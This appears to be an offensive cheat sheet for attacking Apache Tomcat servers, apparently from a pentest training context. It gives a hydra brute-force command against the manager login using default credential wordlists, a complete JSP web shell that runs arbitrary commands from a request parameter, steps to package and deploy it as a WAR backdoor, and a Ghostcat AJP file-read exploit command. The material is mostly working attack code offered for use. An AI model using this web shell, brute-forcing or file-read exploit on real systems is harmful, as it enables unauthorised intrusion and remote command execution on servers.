Web Server Attacks

Attacks on various servers like Apache, Nginx and Tomcat

Tomcat

Service Discovery

$ curl -s http://target/docs/ | grep Tomcat 

Generic structure of a Tomcat installation

├── bin
├── conf
│   ├── catalina.policy
│   ├── catalina.properties
│   ├── context.xml
│   ├── tomcat-users.xml <-- user credentials and roles
│   ├── tomcat-users.xsd
│   └── web.xml
├── lib
├── logs
├── temp
├── webapps
│   ├── manager
│   │   ├── images
│   │   ├── META-INF
│   │   └── WEB-INF
|   |       └── web.xml  <-- describes routes and classes
│   └── ROOT
│       └── WEB-INF
└── work
    └── Catalina
        └── localhost

Important pages are /manger and /host-manager with default weak passwords like tomcat:tomcat or admin:admin

Bruteforcing

$ hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt -f site http-get manager/html

WAR backdoor upload

After logging into the manager console, upload backdoor cmd.jsp

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

Upload the file

$ zip -r mybackdoor.war cmd.jsp 

Browse -> Deploy the war file, and execute commands with

$ curl http://target/mybackdoor/cmd.jsp?cmd=id

Ghostcat

LFI vulnerability that can only read files within the web apps folder, so it can't access /etc/passwd

GitHub - YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi: Tomcat-Ajp协议文件读取漏洞GitHub

$ python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml